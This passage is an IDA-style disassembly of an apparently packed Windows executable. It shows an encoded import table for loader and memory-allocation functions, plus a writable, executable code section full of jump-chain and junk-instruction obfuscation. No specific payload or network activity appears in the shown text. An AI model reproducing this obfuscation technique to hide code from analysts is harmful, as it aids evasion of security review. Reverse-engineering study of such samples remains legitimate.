dword_4352DC	dd 1			; DATA XREF: sub_404170r sub_40ACDFw ...
dword_4352E0	dd 1			; DATA XREF: sub_407720+28r
					; sub_407F20+1Er ...
dword_4352E4	dd 0			; DATA XREF: sub_40AA2F+34r
dword_4352E8	dd 20h			; DATA XREF: sub_408B90+3Cw
					; sub_408B90+BFw ...
		dd 5 dup(0)
dword_435300	dd 0A220B0h		; DATA XREF: sub_406B86+FDr
					; sub_40843A+87r ...
		dd 3Fh dup(0)
dword_435400	dd 0A23188h		; DATA XREF: sub_40843A+2Bw
					; sub_40843A+44w ...
		dd 7 dup(0)
dword_435420	dd 400h	dup(0)		; DATA XREF: .data:off_423950o
					; .data:00423958o
dword_436420	dd 200h			; DATA XREF: sub_40843Ar
					; sub_40843A:loc_408454w ...
dword_436424	dd 0			; DATA XREF: sub_407F15w
dword_436428	dd 1			; DATA XREF: sub_40AF90+B3w
dword_43642C	dd 0A2310Ch		; DATA XREF: sub_4030C9+10r
					; sub_4030C9+9Bw ...
dword_436430	dd 0A23100h		; DATA XREF: sub_4030C9+5r
					; sub_4030C9+87w ...
dword_436434	dd 1			; DATA XREF: sub_4051B3r
					; sub_4051B3+11w ...
dword_436438	dd 0			; DATA XREF: sub_407D29:loc_407D92r
					; sub_407D29+74o ...
dword_43643C	dd 0			; DATA XREF: sub_405E8D+28w
					; sub_405ED5r ...
dword_436440	dd 0			; DATA XREF: sub_405E8D+15w
					; sub_405ED5+6r ...
dword_436444	dd 0			; DATA XREF: sub_403A51+13r
					; sub_405E8D+36w ...
dword_436448	dd 0			; DATA XREF: sub_405E8D+2Fw
					; sub_405F00+2FCw ...
dword_43644C	dd 0			; DATA XREF: sub_405E8D+3Cw
					; sub_406214r ...
dword_436450	dd 0			; DATA XREF: sub_405F00+229r
					; sub_405F00+249r ...
dword_436454	dd 1			; DATA XREF: sub_402E05:loc_402E3Er
					; sub_4039C3+13r ...
dword_436458	dd 152340h		; DATA XREF: sub_4044D2-CDw
					; sub_40AF33:loc_40AF44r ...
		align 1000h
_data		ends

; Section 5. (virtual address 00038000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00001000 (   4096.)
; Offset to raw	data for section: 00038000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_0pcgcaru	segment	para public 'DATA' use32
		assume cs:_0pcgcaru
		;org 438000h
dword_438000	dd 380CCh, 0		; DATA XREF: eu81y7qg:0048EEF8o
		dd 0FFFFFFFFh, 3803Ch, 380B4h, 38108h, 0
		dd 0FFFFFFFFh, 380E8h, 38104h, 5 dup(0)
aKernel32_dl_11	db 'kernel32.dll',0
		align 4
		dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6F4C0000h
		dd 694C6461h, 72617262h, 4179h,	65470000h, 6F725074h, 64644163h
		dd 73736572h, 0
		dd 78450000h, 72507469h, 7365636Fh, 73h, 69560000h, 61757472h
		dd 6C6C416Ch, 636Fh, 69560000h,	61757472h, 6572466Ch, 65h
		dd 77E79F93h, 77E805D8h, 77E7A5FDh, 77E75CB5h, 77E7980Ah
		dd 77E79E34h, 3804Ch, 38060h, 38070h, 38084h, 38094h, 380A4h
		dd 0
aUser32_dll_1	db 'user32.dll',0
		align 4
		dd 654D0000h, 67617373h, 786F4265h, 41h, 77D6ADD7h, 380F4h
		dd 3BDh	dup(0)
_0pcgcaru	ends

; ---------------------------------------------------------------------------
; Section 6. (virtual address 00039000)
; Virtual size			: 00023000 ( 143360.)
; Section size in file		: 00023000 ( 143360.)
; Offset to raw	data for section: 00039000
; Flags	E0000020: Text Executable Readable Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
hvvrg7ie	segment	para public 'CODE' use32
		assume cs:hvvrg7ie
		;org 439000h
; START	OF FUNCTION CHUNK FOR sub_454099
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing

loc_439000:				; CODE XREF: sub_454099-10513j
					; DATA XREF: eu81y7qg:0046E4A8o
		pop	ecx
		sub	ecx, 0EFA8E94Eh
		call	sub_441230
; END OF FUNCTION CHUNK	FOR sub_454099
; START	OF FUNCTION CHUNK FOR sub_455B9C

loc_43900C:				; CODE XREF: sub_455B9C-18BB5j
		jmp	loc_43A890
; END OF FUNCTION CHUNK	FOR sub_455B9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_439011:				; CODE XREF: sub_442FD1-10FCj
		jnb	loc_4580AF

loc_439017:				; CODE XREF: sub_442FD1:loc_43A645j
					; sub_450434-14AA1j ...
		call	sub_4449AD

loc_43901C:				; CODE XREF: sub_448100+D3FFj
		jmp	loc_439FC1
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------

loc_439021:				; CODE XREF: hvvrg7ie:00459F36j
		push	67BC13Eh
		jmp	loc_4580A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EE33

loc_43902B:				; CODE XREF: sub_43EE33:loc_4557FDj
		mov	eax, [ebp-4]
		call	sub_4576E4
		test	al, al
		jnz	loc_445888
		push	offset loc_44B631
		jmp	loc_450A03
; END OF FUNCTION CHUNK	FOR sub_43EE33
; ---------------------------------------------------------------------------

loc_439045:				; CODE XREF: hvvrg7ie:loc_457EFBj
		mov	edi, 99152B04h
		push	48F99908h
		jnb	loc_44B785
		sbb	ecx, 0D41476B2h
		jmp	loc_43C91B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448FB0

loc_439060:				; CODE XREF: sub_448FB0:loc_444E7Fj
		add	edx, ebp
		add	edx, 43963B23h
		mov	[edx], eax
		pop	edx
		call	sub_43B3BE
; END OF FUNCTION CHUNK	FOR sub_448FB0
; START	OF FUNCTION CHUNK FOR sub_455BE2

loc_439070:				; CODE XREF: sub_455BE2-D66j
		jmp	loc_4406C2
; END OF FUNCTION CHUNK	FOR sub_455BE2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D53

loc_439075:				; CODE XREF: sub_449D53+Ej
					; hvvrg7ie:loc_456B99j
		jmp	nullsub_77
; END OF FUNCTION CHUNK	FOR sub_449D53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_43907A:				; CODE XREF: sub_44D2F8:loc_450C93j
		or	ecx, eax
		test	esi, 1FC4BB16h
		jmp	loc_441AF7
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_439087:				; CODE XREF: hvvrg7ie:0043A957j
		call	sub_4425F0
		mov	eax, 0A7A44D83h
		push	edx
		mov	edx, edi
		xchg	edx, [esp]
		push	126F1FE6h
		pop	edi
		sub	edi, 6C60E84Dh
		jmp	loc_459B8D
; ---------------------------------------------------------------------------
		jmp	ds:off_41D1E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4551D4

loc_4390AE:				; CODE XREF: sub_4551D4+Fj
		jmp	loc_457AD3
; END OF FUNCTION CHUNK	FOR sub_4551D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4540B2

loc_4390B3:				; CODE XREF: sub_4540B2-148EAj
		jmp	loc_455F28
; END OF FUNCTION CHUNK	FOR sub_4540B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439529

loc_4390B8:				; CODE XREF: sub_439529+F2ECj
					; hvvrg7ie:loc_44FCE4j	...
		jnb	loc_44881A
		xchg	esi, [esp+0]
		mov	edx, esi
		jmp	loc_4499CC
; END OF FUNCTION CHUNK	FOR sub_439529
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_4390C8:				; CODE XREF: sub_43C0DE:loc_43B7FBj
		popf
		jmp	loc_44AD9E
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_4390CE:				; CODE XREF: sub_44191F:loc_44970Dj
		pop	eax
		or	eax, 4D411508h
		sub	eax, 70208111h
		cmp	eax, 0C12C4A14h
		jmp	loc_44358C
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8FB

loc_4390E6:				; CODE XREF: sub_44C8FB:loc_44EDE2j
		pushf
		mov	ebp, 384A3584h
		jmp	loc_44BB12
; END OF FUNCTION CHUNK	FOR sub_44C8FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AE41

loc_4390F1:				; CODE XREF: sub_43AE41:loc_449E37j
		mov	edi, eax
		jmp	loc_454DE8
; END OF FUNCTION CHUNK	FOR sub_43AE41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_4390F8:				; CODE XREF: sub_43E063+6063j
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-1Ch], 0F7h
		call	sub_44B524

loc_439107:				; CODE XREF: sub_456A52:loc_45B678j
		push	86067D88h
		pop	ebx

loc_43910D:				; CODE XREF: hvvrg7ie:loc_456807j
		and	ebx, 0E72BD052h
		js	loc_43E114

loc_439119:				; CODE XREF: sub_43F227+7D65j
		jmp	sub_454E54
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445B46

loc_43911E:				; CODE XREF: sub_445B46-87F1j
		jmp	loc_43946A
; END OF FUNCTION CHUNK	FOR sub_445B46
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_449. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_439124:				; DATA XREF: sub_456944-1B50Fo
		mov	eax, [ebp-1Ch]
		add	eax, eax

loc_439129:				; CODE XREF: hvvrg7ie:0043E586j
		cdq
		add	eax, [esp]
		adc	edx, [esp+4]
		add	esp, 8
		movzx	eax, word ptr [eax]
		jmp	loc_45395E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441B2C

loc_43913C:				; CODE XREF: sub_441B2C:loc_4433F9j
		xchg	edx, [esp+0]

loc_43913F:				; CODE XREF: hvvrg7ie:loc_451A75j
		jmp	loc_459ED3
; END OF FUNCTION CHUNK	FOR sub_441B2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_439144:				; CODE XREF: sub_44D2F8-2FA2j
		jz	loc_44A510
		jmp	loc_44BE52
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_43914F:				; CODE XREF: hvvrg7ie:0045B76Bj
		rol	edx, 1Dh
		jnb	loc_43B283
; START	OF FUNCTION CHUNK FOR sub_45A91B

loc_439158:				; CODE XREF: sub_45A91B-3CD5j
		jmp	loc_447EEE
; END OF FUNCTION CHUNK	FOR sub_45A91B
; ---------------------------------------------------------------------------
		jz	loc_453255
		not	edi
		adc	ebx, 464028F0h
		and	ecx, eax
		jmp	loc_43B283
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D5

loc_439172:				; CODE XREF: sub_44B2D5+14j
		call	sub_440413

loc_439177:				; CODE XREF: hvvrg7ie:00456860j
		jmp	loc_441C40
; END OF FUNCTION CHUNK	FOR sub_44B2D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_43917C:				; CODE XREF: sub_43D531+19118j
		jmp	loc_43BFFD
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439549

loc_439181:				; CODE XREF: sub_439549+1CAADj
		jmp	loc_44FCBB
; END OF FUNCTION CHUNK	FOR sub_439549
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444F80

loc_439186:				; CODE XREF: sub_444F80+4D86j
		jmp	nullsub_76
; END OF FUNCTION CHUNK	FOR sub_444F80
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451BC8

loc_43918B:				; CODE XREF: sub_451BC8-A395j
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_451BC8

; =============== S U B	R O U T	I N E =======================================



sub_439190	proc near		; DATA XREF: hvvrg7ie:0045115Fo

; FUNCTION CHUNK AT 00439EF0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043DCEB SIZE 00000008 BYTES

		call	sub_450C5A
		push	edx
		push	53A50784h
		pop	edx
		rol	edx, 19h
		jmp	loc_439EF0
sub_439190	endp

; ---------------------------------------------------------------------------

loc_4391A4:				; DATA XREF: sub_4489AE+6o
		mov	ebp, esp
		push	ecx
		mov	[ebp-4], eax
		push	0D426938Ch
		adc	eax, 796C6E45h
		jmp	loc_456C4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442301

loc_4391BA:				; CODE XREF: sub_442301:loc_44A94Fj
		push	edi
		push	0D20A232Dh
		xchg	ebp, [esp+8+var_8]
		mov	edi, ebp
		pop	ebp
		rol	edi, 1Bh
		add	edi, 91B358F2h
		xchg	edi, [esp+4+var_4]
		jmp	loc_447DB6
; END OF FUNCTION CHUNK	FOR sub_442301
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_4391D7:				; CODE XREF: sub_4544DD:loc_448B94j
		sub	eax, 2F46BABFh
		and	eax, 0DBFD1CBFh
		rol	eax, 7
		test	eax, 200000h
		jmp	loc_4578B4
; END OF FUNCTION CHUNK	FOR sub_4544DD

; =============== S U B	R O U T	I N E =======================================



sub_4391F1	proc near		; CODE XREF: sub_43FF39+5p
					; hvvrg7ie:00445CE7j

; FUNCTION CHUNK AT 00447A77 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 0045AD58 SIZE 0000002D BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	56952689h
		pop	ecx
		jmp	loc_45AD58
sub_4391F1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_439200:				; CODE XREF: hvvrg7ie:loc_448F68j
					; sub_443452:loc_4516EFj
		push	0B0DAC417h
		pop	ebx
		xor	ebx, 1F7BF2ABh
		rol	ebx, 1Fh
		add	ebx, 0A8742249h
		push	offset sub_4556E8
		jmp	nullsub_141
; END OF FUNCTION CHUNK	FOR sub_443452
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_43921F:				; CODE XREF: sub_44A2D1+435Cj
					; sub_45038B:loc_4529A2j
		rol	eax, 1
		sub	eax, 1CBE211Dh
		cmp	eax, 1C3FB471h
		jmp	loc_445A64
; END OF FUNCTION CHUNK	FOR sub_45038B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_122. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CB64

loc_439233:				; CODE XREF: sub_44CB64+2F0Dj
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_44CB64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_439238:				; CODE XREF: sub_4403D4+8FEBj
		jmp	loc_4412BD
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_43923D:				; CODE XREF: sub_448BC0:loc_4563C7j
		mov	[ebx], eax
		pop	ebx

loc_439240:				; CODE XREF: sub_448BC0+12j
					; sub_448BC0+3B7Fj
		push	edx
		pushf
		push	0D3D59F45h
		pop	edx
		jmp	loc_458B01
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452C40

loc_43924D:				; CODE XREF: sub_452C40+Ej
		pop	ebx
		sub	eax, 0C2C48FF3h
		jb	loc_43BB76
; END OF FUNCTION CHUNK	FOR sub_452C40
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_43925A:				; CODE XREF: sub_43B3BE+203F4j
		jmp	loc_459106
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
		jb	loc_4500EA
		test	eax, 66484FE3h
		jmp	loc_440FE2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459B2D

loc_439270:				; CODE XREF: sub_459B2D-1061Bj
		or	edi, ebp
		not	ebp

loc_439274:				; CODE XREF: sub_459B2D:loc_45068Cj
		call	nullsub_22
; END OF FUNCTION CHUNK	FOR sub_459B2D
; START	OF FUNCTION CHUNK FOR sub_448100

loc_439279:				; CODE XREF: sub_448100:loc_445C00j
		js	loc_43D401
		xor	eax, eax
		jmp	loc_457CFB
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------

loc_439286:				; CODE XREF: hvvrg7ie:0044AF1Dj
		xchg	ecx, ebp
		jg	loc_44CFE7
; START	OF FUNCTION CHUNK FOR sub_448DB2

loc_43928E:				; CODE XREF: sub_448DB2:loc_44AF0Aj
		and	edx, 9A2473C1h
		add	edx, 6E241E31h
		xchg	edx, [esp+0]
		jmp	sub_43C811
; END OF FUNCTION CHUNK	FOR sub_448DB2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544AA

loc_4392A2:				; CODE XREF: sub_4544AA-EEA8j
		add	edx, 0D4C5912Ch
		add	edx, ebp
		add	edx, 291458BFh
		mov	edx, [edx]
		popf
		mov	dl, [edx]
		mov	[ebp+eax-100h],	dl
		inc	dword ptr [ebp-108h]
		jmp	loc_43C449
; END OF FUNCTION CHUNK	FOR sub_4544AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448C46

loc_4392C7:				; CODE XREF: sub_448C46+9j
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	[ebp-0Ch], eax
		push	offset loc_44C9B5
		jmp	loc_43E0D5
; END OF FUNCTION CHUNK	FOR sub_448C46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_4392DA:				; CODE XREF: sub_440C05-4B7Bj
		mov	ecx, esi
		pop	esi
		xchg	ebx, [esp-4+arg_0]
		mov	ebp, ebx
		jmp	loc_43DCFE
; END OF FUNCTION CHUNK	FOR sub_440C05
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_458. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448FC5

loc_4392E8:				; CODE XREF: sub_448FC5+7j
		jmp	sub_45329F
; END OF FUNCTION CHUNK	FOR sub_448FC5
; ---------------------------------------------------------------------------
		sbb	edx, ebp
		pushf
		jmp	sub_4542E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_4392F5:				; CODE XREF: sub_43D285:loc_443292j
		pushf
		push	39ED4FCh
		pop	edi
		sub	edi, 64CB5E83h
		rol	edi, 9
		or	edi, 6D09971Ch
		jmp	loc_4456A9
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------

loc_439310:				; CODE XREF: hvvrg7ie:00459683j
		pop	esi
		xchg	esi, [esp]
		ror	eax, 8
		jmp	loc_457086

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43931C	proc near		; CODE XREF: sub_454D37:loc_45A0D4j

; FUNCTION CHUNK AT 0043E7DB SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004404BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004413C1 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00449910 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044F984 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004555D8 SIZE 0000001E BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		jmp	loc_4404BA
sub_43931C	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_228. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_439328:				; DATA XREF: sub_448CCA+43BFo
		mov	eax, [esp]
		push	esi
		mov	esi, edx
		xchg	esi, [esp]
		call	sub_45329F
		jmp	loc_440270

; =============== S U B	R O U T	I N E =======================================



sub_43933B	proc near		; CODE XREF: sub_43C43C+8p
					; hvvrg7ie:00458798j

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]

loc_43933E:				; CODE XREF: hvvrg7ie:loc_446950j
		pop	ebx
		xchg	ebp, [esp-4+arg_0]
		push	offset sub_449B47
		jmp	loc_44066F
sub_43933B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4419C0

loc_43934C:				; CODE XREF: sub_4419C0+C8F5j
		sbb	ebx, esi

loc_43934E:				; CODE XREF: sub_4419C0:loc_44E2ADj
		call	sub_4447D3
; END OF FUNCTION CHUNK	FOR sub_4419C0
; START	OF FUNCTION CHUNK FOR sub_450246

loc_439353:				; CODE XREF: sub_450246-90C1j
		jmp	loc_44DF9B
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------

loc_439358:				; CODE XREF: hvvrg7ie:00455943j
		jnz	loc_44FC75
; START	OF FUNCTION CHUNK FOR sub_444034

loc_43935E:				; CODE XREF: sub_444034+6j
		jmp	nullsub_47
; END OF FUNCTION CHUNK	FOR sub_444034
; ---------------------------------------------------------------------------
		not	edx
		jmp	loc_44FC74
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_417. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43936B:				; CODE XREF: sub_450434+8328j
		jmp	loc_439DF3
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B7B9

loc_439370:				; CODE XREF: sub_43B7B9+CFAAj
		jmp	loc_44D251
; END OF FUNCTION CHUNK	FOR sub_43B7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_439375:				; CODE XREF: sub_446D8D-492j
		jnb	loc_454376
		xor	edx, 354D7AD6h
		and	esi, edi
		jmp	loc_43E078
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_439388:				; CODE XREF: sub_43AB99:loc_44D9C2j
		mov	[ebp-8], eax
		push	eax
		push	0BC50B440h
		not	eax
		jmp	loc_455689
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_439398:				; CODE XREF: sub_45B048:loc_45AC12j
		cdq
		jnp	loc_43F8C1
		jmp	loc_442548
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------

loc_4393A4:				; CODE XREF: hvvrg7ie:loc_443E1Dj
		pop	ebx
		pop	eax
		pop	edx
		xchg	ebx, [esp]
		mov	ebp, ebx
		pop	ebx
		jmp	loc_4421D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8C7

loc_4393B2:				; CODE XREF: sub_44C8C7-940Bj
		call	sub_44CE90
; END OF FUNCTION CHUNK	FOR sub_44C8C7
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_4393B7:				; CODE XREF: sub_45061E-106D0j
		jmp	loc_4416A5
; END OF FUNCTION CHUNK	FOR sub_45061E

; =============== S U B	R O U T	I N E =======================================



sub_4393BC	proc near		; CODE XREF: sub_446D8D:loc_443C3Ej
					; sub_4440CB:loc_444D26p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044E5EA SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	ebx, offset byte_46C901
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_44E5EA
sub_4393BC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4393CE:				; CODE XREF: hvvrg7ie:00456B0Cj
		jnz	loc_453A2F
		jmp	loc_45A654
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F7CF

loc_4393D9:				; CODE XREF: sub_44F7CF+6j
		mov	edi, ebp
		xchg	edi, [esp+4+var_4]
		mov	ebp, esp
		push	ebp
		jmp	loc_44384D
; END OF FUNCTION CHUNK	FOR sub_44F7CF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_530. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	ecx, 2A3D409Bh
		jmp	sub_443B77
; ---------------------------------------------------------------------------

loc_4393F1:				; CODE XREF: hvvrg7ie:0043FCABj
		pop	edx

loc_4393F2:				; CODE XREF: hvvrg7ie:0045A618j
		sub	edx, 0E8D22FC6h
		xor	edx, 0B7BC141Fh
		sub	edx, 0C22BC4Eh
		push	offset sub_44C308
		jmp	locret_44382B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B863

loc_43940E:				; CODE XREF: sub_45B863-1BE97j
		mov	[edx], eax
		pop	edx
		xchg	ebx, [esp-4+arg_0]
		mov	ecx, ebx
		pop	ebx
		jmp	loc_4451DA
; END OF FUNCTION CHUNK	FOR sub_45B863
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_43941C:				; CODE XREF: sub_44616F:loc_44B16Ej
		mov	edx, eax
		xchg	edx, [esp+0]
		push	edi

loc_439422:				; CODE XREF: hvvrg7ie:00453E80j
		push	916D0F35h
		pop	edi
		xor	edi, 16BF800Dh
		js	loc_43FAB5
; END OF FUNCTION CHUNK	FOR sub_44616F
; START	OF FUNCTION CHUNK FOR sub_447D56

loc_439434:				; CODE XREF: sub_447D56+3j
		jmp	loc_44632E
; END OF FUNCTION CHUNK	FOR sub_447D56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DEE

loc_439439:				; CODE XREF: sub_442DEE+7j
		jmp	loc_45ACD5
; END OF FUNCTION CHUNK	FOR sub_442DEE
; ---------------------------------------------------------------------------
		ror	ebx, 17h
		jmp	loc_44D28C
; ---------------------------------------------------------------------------

loc_439446:				; CODE XREF: hvvrg7ie:loc_45B217j
		jge	loc_458EBE
		jmp	loc_447A5D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_439451:				; CODE XREF: hvvrg7ie:0044ACE1j
					; sub_458F33-3473j
		xchg	edx, [esp+0]
		jmp	sub_43A87E
; END OF FUNCTION CHUNK	FOR sub_458F33
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_387. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_43945A:				; CODE XREF: sub_4544DD+4BFEj
		jmp	loc_440AE9
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_43945F:				; CODE XREF: sub_4512A0-ACE7j
		cmp	eax, 0E29D4D55h

loc_439465:				; CODE XREF: hvvrg7ie:loc_45906Aj
		jmp	loc_454FEB
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445B46

loc_43946A:				; CODE XREF: sub_445B46:loc_43911Ej
		mov	edx, esi
		mov	esi, edx
		jmp	loc_43FFCB
; END OF FUNCTION CHUNK	FOR sub_445B46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B7D

loc_439473:				; CODE XREF: sub_455B7D:loc_458DC2j
		jz	loc_44EC95
		jmp	loc_4550F8
; END OF FUNCTION CHUNK	FOR sub_455B7D
; ---------------------------------------------------------------------------
		sbb	ebp, ebx
		sub	esi, 118DD2B3h
		jmp	sub_44398A
; ---------------------------------------------------------------------------

loc_43948B:				; DATA XREF: hvvrg7ie:004550A0o
		push	edx
		mov	edx, eax
		call	sub_44C8C7
; START	OF FUNCTION CHUNK FOR sub_443375

loc_439493:				; CODE XREF: sub_443375-9A49j
		jmp	sub_4584F2
; END OF FUNCTION CHUNK	FOR sub_443375

; =============== S U B	R O U T	I N E =======================================



sub_439498	proc near		; DATA XREF: sub_440402+F7A8o
		add	esp, 8
		push	offset loc_43BC24
		jmp	loc_45201E
sub_439498	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4394A5:				; DATA XREF: sub_45493B-CF91o
		mov	byte ptr [ebp-804h], 0
		mov	byte ptr [ebp-803h], 0
		mov	byte ptr [ebp-802h], 0
		mov	byte ptr [ebp-801h], 1
		lea	eax, [ebp-80Ch]
		jmp	loc_4458ED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447AC

loc_4394CC:				; CODE XREF: sub_4447AC:loc_4408A4j
		xor	edi, 0E80ED509h
		and	edi, 8B9975BDh
		rol	edi, 16h

loc_4394DB:				; CODE XREF: hvvrg7ie:loc_455B0Dj
		test	edi, 80000000h
		jmp	loc_44DBE2
; END OF FUNCTION CHUNK	FOR sub_4447AC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_519. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414D3

loc_4394E7:				; CODE XREF: sub_4414D3+6539j
		jmp	loc_446BBD
; END OF FUNCTION CHUNK	FOR sub_4414D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_4394EC:				; CODE XREF: sub_44D2F8-6A85j
		jmp	loc_44C762
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
